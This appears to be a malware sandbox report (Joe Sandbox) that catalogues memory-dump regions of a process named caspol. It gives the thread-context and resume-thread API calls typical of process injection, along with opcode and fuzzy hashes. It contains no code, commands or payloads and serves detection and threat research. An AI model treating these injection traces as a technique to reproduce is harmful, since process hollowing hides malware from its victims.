                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 79d6a39056b48f81709e3d64a4473c82211d5ced38894f7bb8e99b0e624375b9
                                                                      • Instruction ID: 5d906e84a0e7ecd135592424afc6833f41fe14ebaad99b87d4bda6f8a6a5f8e9
                                                                      • Opcode Fuzzy Hash: 79d6a39056b48f81709e3d64a4473c82211d5ced38894f7bb8e99b0e624375b9
                                                                      • Instruction Fuzzy Hash: FE41CEB5D002589FCB10CFA9D884AEEFBF1AF49314F24802AE419B7244C3389A49CF54
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0037D957
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 2fcc243a0e91ad37bd9f822c439b2d34d4e3f60e4f0930e287f5d769af200f5f
                                                                      • Instruction ID: f11879d5d32c26567ebbb2f74bf84ad4a928d2048f5f7aa309b4d244462efc2a
                                                                      • Opcode Fuzzy Hash: 2fcc243a0e91ad37bd9f822c439b2d34d4e3f60e4f0930e287f5d769af200f5f
                                                                      • Instruction Fuzzy Hash: 6B41ACB5D002589FCB10CFA9D884AEEFBF1AF49314F24802AE519B7244D738A949CF54
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 0037D836
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: d5fde5beef2a19a51853e09d52f7d4bbba66cfab1547e7458b97379b83dd725c
                                                                      • Instruction ID: 2aefdafe1464fc7c3ac7f1c905be2822a0d580f1e2331c8fbd51e504c95a155c
                                                                      • Opcode Fuzzy Hash: d5fde5beef2a19a51853e09d52f7d4bbba66cfab1547e7458b97379b83dd725c
                                                                      • Instruction Fuzzy Hash: 2F31ABB5D002189FCF14CFA9D984AAEFBB5AF49314F14942AE819B7200D735A906CF95
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 0037D836
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 162064fa0f39eb9157af18e3c49150fac239011b8debb00f1fbbe1007ff6078b
                                                                      • Instruction ID: 4d2e6fb46f868c0ce35390af247ff8222bd956adae101cb7956631598e8ef24b
                                                                      • Opcode Fuzzy Hash: 162064fa0f39eb9157af18e3c49150fac239011b8debb00f1fbbe1007ff6078b
                                                                      • Instruction Fuzzy Hash: 2531BAB4D00218AFCF14CFA9D984AAEFBB5AF49314F24942AE819B7300C735A905CF95
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gN
                                                                      • API String ID: 0-1609106795
                                                                      • Opcode ID: 32bb58f9918f9f605a1a560908d653be6c3b9e4181263fb3112e58e5268b6904
                                                                      • Instruction ID: ed4783089930a8b813d198629a4970b4ce2cc10b10cec491da38bbcbfd1e4aca
                                                                      • Opcode Fuzzy Hash: 32bb58f9918f9f605a1a560908d653be6c3b9e4181263fb3112e58e5268b6904
                                                                      • Instruction Fuzzy Hash: 3C412C75E45219CFDB64CF64CC807E8B7B5BF99300F2096EAD509A6241EB745AC4DF80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 92fb8925b0ca80c0978b1c8855d66d0af7dcd80e55fb44d8b4689133f552d24a
                                                                      • Instruction ID: 31afa69201363345764b3814cbdbd22005bc8c9dde5a00b5220dc965c65f08c3
                                                                      • Opcode Fuzzy Hash: 92fb8925b0ca80c0978b1c8855d66d0af7dcd80e55fb44d8b4689133f552d24a
                                                                      • Instruction Fuzzy Hash: BA01EF3590A228CFEB60CF64C884FE8BBB5AB09304F949199D40DA3252C7359E86CF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7d2f0de1779060e6059cb6eaa5bdae13aadf84809e124661b26585c886f400d
                                                                      • Instruction ID: c13f8f1918b7f890bff774da892e9b2f6c88c12ec71d60ce510fd44284538393
                                                                      • Opcode Fuzzy Hash: a7d2f0de1779060e6059cb6eaa5bdae13aadf84809e124661b26585c886f400d
                                                                      • Instruction Fuzzy Hash: 49413E74909218CFEB64CF54C954BE8B7B9FB4A311F5490EA840EA3292C7399EC5DF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532221927.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_17d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
                                                                      • Instruction ID: 46e9946be57261d5209dbc6b84a9c910d9bf55ea884654932b9c3cc7d8bb4c1b
                                                                      • Opcode Fuzzy Hash: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
                                                                      • Instruction Fuzzy Hash: 3521B0B5604248AFDB15DF14E9C0B26BBB5EF84314F24C5A9E8494B256C336D847CB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532221927.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_17d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                                                                      • Instruction ID: d164b459a808e4dc30d8f9d11a3c02c5438a412f86134e511d9242d1057f6da0
                                                                      • Opcode Fuzzy Hash: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                                                                      • Instruction Fuzzy Hash: B321D075604248EFDB15CF14E884B26BB71EF84314F34C5A9E84D4B246C336D847CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cda0344fd149f7bbb8440f82a63d505c30f548456d80cafa9b86c1929f1697e1
                                                                      • Instruction ID: 468777e6324c63455aafd155cbf03590b423cf98bc2ce6791c608de7bd2e7096
                                                                      • Opcode Fuzzy Hash: cda0344fd149f7bbb8440f82a63d505c30f548456d80cafa9b86c1929f1697e1
                                                                      • Instruction Fuzzy Hash: BD21E374E49218CFDB60CF64D890BECBBB6BB49314F6091A9D40DA7256CB355E82DF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532221927.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_17d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                                                                      • Instruction ID: ce486fcf9abe6ec95ceb8dbf38f3db559b2253b8cea6385595494ee791a13ebc
                                                                      • Opcode Fuzzy Hash: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                                                                      • Instruction Fuzzy Hash: 92218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498F2A7C33A984ACB62
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99b7f4555b8ba8bebaa4cbd5e29d468732363d2457fbb1c238c7747f47daa957
                                                                      • Instruction ID: 61dc07d80988b0491f657400845364f2d63d4d49830321ed1cc3bb80fd52a1ec
                                                                      • Opcode Fuzzy Hash: 99b7f4555b8ba8bebaa4cbd5e29d468732363d2457fbb1c238c7747f47daa957
                                                                      • Instruction Fuzzy Hash: B2114C75A45218DFEB60CF54CD84BECB7B8AB19300F6490EAD54EA7282CBB45AC5CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532221927.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_17d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction ID: 0041194c1817ab7fc62789af46a91491cb852afa837990730b6338af1206f0ea
                                                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction Fuzzy Hash: 3F117975944284DFDB12CF14D5C4B15BBB1FF84314F28C6A9D8494B656C33AD84ACBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e58783f97257f94e337031d7707191c5982f4578f850bbc889443d73f46eebaa
                                                                      • Instruction ID: 9beaa8314d99558c961735a3ed7e4c27c4c710cf6bd6c80574af19cfc2a1c92d
                                                                      • Opcode Fuzzy Hash: e58783f97257f94e337031d7707191c5982f4578f850bbc889443d73f46eebaa
                                                                      • Instruction Fuzzy Hash: 4311F3B8D04249DFCB44DFA9D5956BEBBF5BB89300F2090AAC819A3346E7345B41CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dae1f512f55cdbfec2bc2c706d1ddb4c96b2da483c38be33de5559d42c4d3e4e
                                                                      • Instruction ID: 57d08ce45db6b6880cf21118371571b909eece099a0aab619c4501614df968e5
                                                                      • Opcode Fuzzy Hash: dae1f512f55cdbfec2bc2c706d1ddb4c96b2da483c38be33de5559d42c4d3e4e
                                                                      • Instruction Fuzzy Hash: 51112975A44218DFEB60CF54CC80BECB7B8AB19300F6490DAE54DA7282C7B49AC5CF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c5a3dd009390f91568dfaf2f1bb8e4a8825313c1b95f5b0fefb6c2f155ccc3e7
                                                                      • Instruction ID: 6852a53db2bab5922f82051f2349b4e13054bfde4a024499911a52d21a5c79f4
                                                                      • Opcode Fuzzy Hash: c5a3dd009390f91568dfaf2f1bb8e4a8825313c1b95f5b0fefb6c2f155ccc3e7
                                                                      • Instruction Fuzzy Hash: 94112A74908218CFDB60DF64C895BECBBB4AB09311F1449D9D00DAB292C7388EC5CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51f5ff024b9827ff4311d741a9f22717ebb63b5ca48abceb0efb476e44169b9a
                                                                      • Instruction ID: 5e17fbaa6cf005ae49d16c3de7bfd3361183e8256ad92a449d280f941903f857
                                                                      • Opcode Fuzzy Hash: 51f5ff024b9827ff4311d741a9f22717ebb63b5ca48abceb0efb476e44169b9a
                                                                      • Instruction Fuzzy Hash: 7A014F75A44218DFEB60CF50CC81BECB7B8AB19300F2480D5E50DAB282C7745AC5CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3484fefc7b24e21066ad395bbde3d041341eb80a607cfc7e1cd9fbbff9cf5f97
                                                                      • Instruction ID: caf46d6ec04e4613fccfe94200ac760dbc686aac671b0ca197808c73bdf378f4
                                                                      • Opcode Fuzzy Hash: 3484fefc7b24e21066ad395bbde3d041341eb80a607cfc7e1cd9fbbff9cf5f97
                                                                      • Instruction Fuzzy Hash: 61014C74E092548FDB51CF68CC94ADDBBB1FF49304F2440EAD909AB252C7325A41CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7e3f0594dba1a6cf1887991bef3e48e5dd83e5cba4d365cc0b6fcd7f3f04a7bd
                                                                      • Instruction ID: 6bfd1a7e5b62b61231cac142be51c74e192a260f6571f3f36835ae1fc6f490dc
                                                                      • Opcode Fuzzy Hash: 7e3f0594dba1a6cf1887991bef3e48e5dd83e5cba4d365cc0b6fcd7f3f04a7bd
                                                                      • Instruction Fuzzy Hash: D2013C35906228CFDF60CFA0CD40BEDBBB5EF49305F6850D9904DA7262C6359A86DF41
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8bd742d08b729647544b3a122298a2f5fa8a3419a04a7d459ea124ec6a1d93b2
                                                                      • Instruction ID: c6764420cfadcf417f6bdcb09e7532b164dc8685d9af06dfb9de2e4116191c9b
                                                                      • Opcode Fuzzy Hash: 8bd742d08b729647544b3a122298a2f5fa8a3419a04a7d459ea124ec6a1d93b2
                                                                      • Instruction Fuzzy Hash: 49F0A4B4E04209DFDB40DFB9D950AAEFBF5EB49300F5495AAC818E3351EB359A41DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f6490517a475f034281f8fbbe3ff57d1c292a409977e9a937d07f65061e8e62
                                                                      • Instruction ID: 450ef3ee57d4fc482fc2f34768d9c7d00f1147bcc39494ec92f4d273df523265
                                                                      • Opcode Fuzzy Hash: 5f6490517a475f034281f8fbbe3ff57d1c292a409977e9a937d07f65061e8e62
                                                                      • Instruction Fuzzy Hash: 5301A435918394CFDB20CB24C855AECBBB4BF06321F5882EA881E972E3D7348946CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb748fbbc1fca1027396ef4c8a81d6723c3a31117a146bc36eb67b78de8c2a34
                                                                      • Instruction ID: 2fd3bb0d5c4dc6985eceff2444ff92832bfe52a8128d45fab30405632d5d9a89
                                                                      • Opcode Fuzzy Hash: cb748fbbc1fca1027396ef4c8a81d6723c3a31117a146bc36eb67b78de8c2a34
                                                                      • Instruction Fuzzy Hash: 82019D759402289FEBA0DF54C891BD8B7B4AB09311F5484D9D608A3241DB399B85DF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ca2f11839b2f9d069a67a8bff5599b6753d43291611d8702dbbd38c31a66416e
                                                                      • Instruction ID: 92347d98cee80eae4632660dd6737fc83f3ca77ce5c58ba6376ab3c20f7fbc7a
                                                                      • Opcode Fuzzy Hash: ca2f11839b2f9d069a67a8bff5599b6753d43291611d8702dbbd38c31a66416e
                                                                      • Instruction Fuzzy Hash: 3CF03070D0420CDFDB00DFA5E9947ADBBB8AB49301F1091A5C409A3253D7341A41DF88